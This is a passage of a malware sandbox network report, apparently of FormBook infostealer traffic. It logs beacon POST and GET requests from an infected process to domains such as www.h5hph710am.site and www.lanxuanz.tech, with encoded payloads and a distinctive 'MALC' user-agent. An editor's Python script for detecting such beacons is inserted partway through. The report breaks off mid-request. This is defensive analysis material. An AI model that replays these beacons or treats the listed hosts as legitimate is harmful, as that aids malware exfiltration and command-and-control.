                                                                    Data Raw: 76 78 50 44 3d 78 54 79 79 6e 4e 4d 6f 31 49 53 70 35 61 6f 42 6d 78 39 34 79 73 54 33 54 69 73 67 46 62 2b 41 2b 6a 35 4d 48 50 32 72 6e 62 77 48 61 70 30 43 69 42 7a 55 33 2b 77 41 51 69 36 69 39 74 31 67 51 4c 68 55 6e 64 74 50 7a 75 6b 41 4f 33 67 42 49 67 30 69 4b 4a 34 38 53 56 44 45 31 4d 32 63 30 57 64 6f 75 44 42 52 4f 54 51 56 2f 77 30 6d 39 4f 39 71 44 44 6f 41 31 78 76 6f 36 53 70 63 70 6d 5a 6a 70 48 6a 68 70 78 68 50 48 6f 57 64 4e 48 6f 6d 39 44 4a 38 62 2b 66 61 34 72 73 77 54 4b 6a 79 45 68 36 54 6b 4f 68 61 37 4b 6b 71 2b 5a 56 43 6d 58 46 77 48 63 70 52 2f 55 43 74 61 53 37 4b 74 56 73 3d
                                                                    Data Ascii: vxPD=xTyynNMo1ISp5aoBmx94ysT3TisgFb+A+j5MHP2rnbwHap0CiBzU3+wAQi6i9t1gQLhUndtPzukAO3gBIg0iKJ48SVDE1M2c0WdouDBROTQV/w0m9O9qDDoA1xvo6SpcpmZjpHjhpxhPHoWdNHom9DJ8b+fa4rswTKjyEh6TkOha7Kkq+ZVCmXFwHcpR/UCtaS7KtVs=
                                                                    Oct 30, 2024 04:59:07.453797102 CET | 720 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Wed, 30 Oct 2024 03:59:07 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 555
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    38 | 192.168.2.5 | 50020 | 144.34.186.85 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:59:09.360440969 CET | 756 | OUT | POST /ni9w/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.h5hph710am.site
                                                                    Origin: http://www.h5hph710am.site
                                                                    Referer: http://www.h5hph710am.site/ni9w/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 78 54 79 79 6e 4e 4d 6f 31 49 53 70 32 61 59 42 67 57 70 34 6a 38 54 30 50 53 73 67 50 37 2b 4d 2b 6a 6c 4d 48 4f 79 37 6d 70 6b 48 64 4d 59 43 68 41 7a 55 30 2b 77 41 59 43 36 72 67 39 31 70 51 4c 74 71 6e 64 42 50 7a 75 77 41 4f 33 51 42 49 58 67 68 4c 5a 34 2b 4a 6c 44 38 78 4d 32 63 30 57 64 6f 75 48 70 72 4f 54 49 56 38 42 45 6d 38 76 39 72 4e 6a 6f 42 79 78 76 6f 2b 53 70 59 70 6d 59 41 70 43 36 47 70 30 74 50 48 74 71 64 4e 53 63 68 6d 54 49 35 66 2b 66 50 35 61 5a 53 65 49 66 62 5a 69 33 6c 35 76 52 38 33 63 4a 41 6b 37 64 71 31 33 70 49 58 50 68 6d 75 6b 6a 45 41 78 72 36 7a 43 34 46 6b 6c 31 6e 6c 30 5a 64 65 67 6b 63 50 4a 54 72 52 77 57 65
                                                                    Data Ascii: vxPD=xTyynNMo1ISp2aYBgWp4j8T0PSsgP7+M+jlMHOy7mpkHdMYChAzU0+wAYC6rg91pQLtqndBPzuwAO3QBIXghLZ4+JlD8xM2c0WdouHprOTIV8BEm8v9rNjoByxvo+SpYpmYApC6Gp0tPHtqdNSchmTI5f+fP5aZSeIfbZi3l5vR83cJAk7dq13pIXPhmukjEAxr6zC4Fkl1nl0ZdegkcPJTrRwWe
                                                                    Oct 30, 2024 04:59:10.005563974 CET | 720 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Wed, 30 Oct 2024 03:59:09 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 555
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    39 | 192.168.2.5 | 50021 | 144.34.186.85 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:59:11.905972958 CET | 1773 | OUT | POST /ni9w/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1241
                                                                    Host: www.h5hph710am.site
                                                                    Origin: http://www.h5hph710am.site
                                                                    Referer: http://www.h5hph710am.site/ni9w/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 78 54 79 79 6e 4e 4d 6f 31 49 53 70 32 61 59 42 67 57 70 34 6a 38 54 30 50 53 73 67 50 37 2b 4d 2b 6a 6c 4d 48 4f 79 37 6d 6f 63 48 64 36 4d 43 69 6e 6e 55 31 2b 77 41 53 69 36 6d 67 39 30 35 51 49 63 74 6e 64 64 78 7a 74 49 41 50 56 59 42 41 47 67 68 42 5a 34 2b 57 56 44 48 31 4d 33 65 30 57 73 76 75 44 31 72 4f 54 49 56 38 43 63 6d 31 65 39 72 50 6a 6f 41 31 78 76 65 36 53 70 38 70 6c 70 37 70 43 50 78 70 6e 6c 50 47 4e 61 64 50 67 45 68 71 54 49 33 53 65 65 4b 35 61 46 6b 65 4d 2f 35 5a 6a 7a 50 35 6f 6c 38 31 71 34 4d 6e 5a 4e 4a 70 52 70 46 55 59 78 44 34 30 6a 64 48 44 6a 65 75 54 45 58 75 42 35 4b 79 53 56 6e 56 52 77 4a 53 74 36 6b 62 48 62 68 30 45 59 59 35 53 5a 47 53 7a 33 33 36 61 49 70 6a 50 69 56 71 56 74 30 71 32 6e 32 48 61 78 45 6b 6d 4f 74 63 32 7a 36 43 36 70 6f 6c 6b 37 61 73 44 78 53 36 79 47 7a 37 6e 39 76 71 6a 51 5a 47 62 53 4e 69 52 6b 2f 30 76 63 42 76 72 70 78 64 72 76 6c 77 63 4b 6b 2f 41 55 38 79 50 41 32 76 57 61 34 47 38 51 44 7a 72 6c 7a 67 61 31 31 32 [TRUNCATED]
                                                                    Data Ascii: vxPD=[TRUNCATED]
                                                                    Oct 30, 2024 04:59:12.557594061 CET | 720 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Wed, 30 Oct 2024 03:59:12 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 555
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    40 | 192.168.2.5 | 50022 | 144.34.186.85 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:59:14.457504988 CET | 474 | OUT | GET /ni9w/?vxPD=8RaSk5tWi66Sq48MhHZUoNqLIlgjLo7w7AJBRYL2j4srPIRV3wjO+oo3VCeYgIIWRIVLwvpyy/VAIW0MNnFhP5IMZ0bC4qCM9jFMkTpJYlgGjxgR3domNTZU3RfMxSMm9A==&7JH=bvSPlHnHQ4A HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.h5hph710am.site
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:59:15.088462114 CET | 720 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.0
                                                                    Date: Wed, 30 Oct 2024 03:59:15 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 555
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    41 | 192.168.2.5 | 50023 | 136.143.186.12 | 80 | 1492 | C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:59:20.388447046 CET | 730 | OUT | POST /1q08/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.lanxuanz.tech
                                                                    Origin: http://www.lanxuanz.tech
                                                                    Referer: http://www.lanxuanz.tech/1q08/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 70 54 4d 31 7a 65 52 32 53 6a 69 70 62 31 35 63 6a 34 75 66 66 70 58 43 35 4a 78 73 6f 62 79 4d 33 71 79 68 39 76 37 41 4b 6d 35 70 6e 42 50 53 4a 56 64 50 4d 4d 43 6b 61 49 78 75 62 67 44 78 6a 77 33 67 4d 56 73 35 48 6e 53 37 50 31 62 4b 32 39 6a 30 38 79 62 76 61 4d 35 63 51 50 4a 67 44 78 45 61 4b 65 44 53 78 71 63 54 36 63 31 76 47 2b 33 4d 4e 79 76 43 34 58 72 52 65 61 38 32 79 56 71 55 54 5a 5a 75 4b 34 2f 75 36 61 41 67 36 5a 4c 30 6e 7a 37 63 44 4d 55 6e 71 70 59 2f 48 37 65 4c 72 4c 63 49 5a 46 56 35 5a 5a 51 79 62 4a 69 5a 31 6d 34 68 66 50 6f 50 36 4d 51 6d 38 61 6d 72 78 64 30 3d
                                                                    Data Ascii: vxPD=pTM1zeR2Sjipb15cj4uffpXC5JxsobyM3qyh9v7AKm5pnBPSJVdPMMCkaIxubgDxjw3gMVs5HnS7P1bK29j08ybvaM5cQPJgDxEaKeDSxqcT6c1vG+3MNyvC4XrRea82yVqUTZZuK4/u6aAg6ZL0nz7cDMUnqpY/H7eLrLcIZFV5ZZQybJiZ1m4hfPoP6MQm8amrxd0=
                                                                    Oct 30, 2024 04:59:21.101171017 CET | 1236 | IN | HTTP/1.1 404
                                                                    Server: ZGS
                                                                    Date: Wed, 30 Oct 2024 03:59:21 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: zalb_8ae64e9492=cd858cf068bec389eea549b00143a3a9; Path=/
                                                                    Set-Cookie: csrfc=12f92c7b-b994-4e80-9cff-9f2ac4bd3adc;path=/;priority=high
                                                                    Set-Cookie: _zcsr_tmp=12f92c7b-b994-4e80-9cff-9f2ac4bd3adc;path=/;SameSite=Strict;priority=high
                                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                    vary: accept-encoding
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 35 37 35 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cc 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 28 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 91 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 93 f5 69 76 03 8b e2 b9 f1 7c df 39 24 9b bc b9 fb 72 fb fb 9f bf fd 82 0a 5d b2 f5 0f 49 fd 83 10 4a 0a 82 33 fb 64 06 25 d1 18 71 5c 92 95 23 c5 46 68 e5 a0 54 70 4d b8 5e 39 5c 50 9e 91 c3 25 e2 22 17 8c 89 bd 79 c2 32 2d e8 03 31 8f 8a d3 aa 22 da 41 de c9 9c a6 9a 91 f5 5f a2 10 89 57 3f 1f 67 18 e5 f7 48 3f 56 e0 48 93 83 f6 52 05 ae 24 61 2b 47 e9 47 46 54 41 8c a5 42 92 7c e5 78 7b b2 c9 21 0a f5 29 c7 25 65 8f ab 2f 15 e1 3f 7e c5 5c c5 73 df bf bc f6 7d e7 64 d7 6a 1f 47 f0 d9 88 ec f1 f9 3c 84 8f b1 e4 d6 86 62 c7 58 42 c6 92 73 89 14 fc b8 8a 48 9a df 0c 15 14 7d 22 f1 6c 56 1d ba 73 25 96 5b ca 63 1f de a3 ce 44 85 b3 8c f2 ed c8 cc 06 a7 f7 5b 29 76 3c 73 53 c1 84 8c 2f f2 c8 7c 5b 86 ff 39 3f 5e 69 51 dd 1a 31 f5 3c 61 25 46 6e 29 9e 5c 48 28 c1 d2 dd 4a 9c 51 80 eb 3d 23 b9 be 44 17 b9 3f [TRUNCATED]
                                                                    Data Ascii: 575X[o6~`h(%+v:{%"BINRkiv|9$r]IJ3d%q\#FhTpM^9\P%"y2-1"A_W?gH?VHR$a+GGFTAB|x{!)%e/?~\s}djG<bXBsH}"lVs%[cD[)v<sS/|[9?^iQ1<a%Fn)\H(JQ=#D?_Euu,Xyo?LSt7Ba6%?DvL1)R{7V</fKOsN{vPc}0@J0|-NeNt$E+Ca^uK0gE,0][`Zn~.^D %cT,#|K1{Q;,1oz&j5#ZIdZA@OXU0_Qcq&?!S
                                                                    Oct 30, 2024 04:59:21.101231098 CET | 729 | IN | Data Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73
                                                                    Data Ascii: ZX8)UZl{kg4,4hJjS2OI16_2V7msr$0Njq{}7Mpa [^Xw7)fGL6n0WE5<5-VI0F#)514csjq\GQ=uwOS{<,GrK
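
Every request in sessions 34 to 42 has the same shape: one process (PID 1492) walks through unrelated hosts (www.dto20.shop, www.h5hph710am.site, www.lanxuanz.tech) within seconds, sends a POST to a short single-directory path with one short form key (vxPD) carrying a base64-looking blob, follows up with a GET that carries the same key plus a second one (7JH) in the query string, synthesises Origin and Referer to match Host and path, always sets Connection: close, and uses a legacy IE User-Agent whose last token, MALC, does not belong to any real browser string. Most of the hosts answer 404, which is consistent with FormBook's known habit of mixing decoy domains with its live C2. The script below is an added example by the editor, not part of the Joe Sandbox report and not a Suricata or vendor signature: it parses two requests copied from sessions 36 and 37 (Accept headers dropped for brevity) plus one constructed benign request, and reports which of those traits each one exhibits. The trait names, regular expressions, the three-trait threshold and the benign sample are the editor's assumptions.

```python
"""Heuristic triage of HTTP requests shaped like the beacons captured above.
Editor's added example, not part of the Joe Sandbox report and not a vendor
signature: traits are read off the requests visible in this report; regexes,
trait names and the scoring threshold are the editor's assumptions."""
import re
from dataclasses import dataclass

# Every request above uses a legacy IE UA string ending in the non-standard token "MALC".
UA_MARKER = re.compile(r"MSIE 10\.0; Windows NT 6\.1; Trident/6\.0; MALC\)$")
# Beacon path: one short alphanumeric directory with a trailing slash (/zlyl/, /ni9w/, /1q08/).
BEACON_PATH = re.compile(r"^/[A-Za-z0-9]{3,6}/$")
# Payload: short keys (vxPD, 7JH) carrying base64-looking blobs sent without percent-encoding.
SHORT_KEY = re.compile(r"^[A-Za-z0-9]{2,5}$")
B64ISH = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")


@dataclass
class HttpRequest:
    method: str
    path: str
    query: str
    headers: dict
    body: str = ""


def parse_request(raw: str) -> HttpRequest:
    """Parse a raw HTTP/1.1 request: request line, headers, blank line, optional body."""
    head, _, body = raw.strip("\n").partition("\n\n")
    lines = head.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, query, headers, body.strip())


def split_form(data: str) -> list:
    """Split key=value pairs without decoding: urllib's parse_qsl would turn the raw '+'
    in these blobs into spaces and defeat the base64 check."""
    pairs = []
    for chunk in data.split("&"):
        if chunk:
            key, _, value = chunk.partition("=")
            pairs.append((key, value))
    return pairs


def beacon_indicators(req: HttpRequest) -> list:
    """Return the names (editor's) of the beacon traits this request exhibits."""
    hits = []
    if UA_MARKER.search(req.headers.get("user-agent", "")):
        hits.append("ua-marker")
    if BEACON_PATH.match(req.path):
        hits.append("short-dir-path")
    host = req.headers.get("host", "")
    # The POSTs above synthesise Origin and Referer to match Host and path exactly.
    if (req.headers.get("origin") == f"http://{host}"
            and req.headers.get("referer") == f"http://{host}{req.path}"):
        hits.append("self-referential-origin")
    pairs = split_form(req.body if req.method == "POST" else req.query)
    if pairs and all(SHORT_KEY.match(k) and B64ISH.match(v) for k, v in pairs):
        hits.append("short-key-b64-payload")
    if req.headers.get("connection", "").lower() == "close":
        hits.append("connection-close")
    return hits


def is_probable_beacon(req: HttpRequest) -> bool:
    """Assumed scoring: the UA marker alone decides; otherwise three structural traits."""
    hits = beacon_indicators(req)
    return "ua-marker" in hits or len(hits) >= 3


def beacon_hosts(requests) -> list:
    """Distinct Host values hit by probable beacons (one process cycles several above)."""
    return sorted({r.headers.get("host", "") for r in requests if is_probable_beacon(r)})


# Requests copied from sessions 36 and 37 above (Accept headers dropped), plus one
# constructed benign request as a control.
SAMPLES = [
    """GET /zlyl/?vxPD=Ol7+XR9be+0p6ZvC9qKVEv0Hj0TGab+KR+2v1t8GCnFaAg3dec/002KiYj/aEuecGLCmVtqBzfUyHhXipe21UKmYS12AvSLU6uuH/hqX9wcAM20fmpYouhsYXjVvYDGKbw==&7JH=bvSPlHnHQ4A HTTP/1.1
Connection: close
Host: www.dto20.shop
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
""",
    """POST /ni9w/ HTTP/1.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Host: www.h5hph710am.site
Origin: http://www.h5hph710am.site
Referer: http://www.h5hph710am.site/ni9w/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)

vxPD=xTyynNMo1ISp5aoBmx94ysT3TisgFb+A+j5MHP2rnbwHap0CiBzU3+wAQi6i9t1gQLhUndtPzukAO3gBIg0iKJ48SVDE1M2c0WdouDBROTQV/w0m9O9qDDoA1xvo6SpcpmZjpHjhpxhPHoWdNHom9DJ8b+fa4rswTKjyEh6TkOha7Kkq+ZVCmXFwHcpR/UCtaS7KtVs=
""",
    """GET /search?q=hello+world&page=2 HTTP/1.1
Connection: keep-alive
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
""",
]
```

Run it as `reqs = [parse_request(s) for s in SAMPLES]` and inspect `beacon_indicators(r)` and `beacon_hosts(reqs)`: both copied requests score as beacons and the host list reproduces the rotation across www.dto20.shop and www.h5hph710am.site, while the constructed browser request scores nothing. Two caveats for anyone turning this into a production rule: the MALC suffix is the strongest single indicator but is trivial for the operator to change, so the structural traits are what survive a rebuild, and those traits are noisy enough on their own that the host-rotation view (one client, several unrelated hosts, mostly 404, seconds apart) should be part of the decision rather than a per-request match.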


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                    42 | 192.168.2.5 | 50024 | 136.143.186.12 | 80
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Oct 30, 2024 04:59:23.244004965 CET | 750 | OUT | POST /1q08/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.lanxuanz.tech
                                                                    Origin: http://www.lanxuanz.tech
                                                                    Referer: http://www.lanxuanz.tech/1q08/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
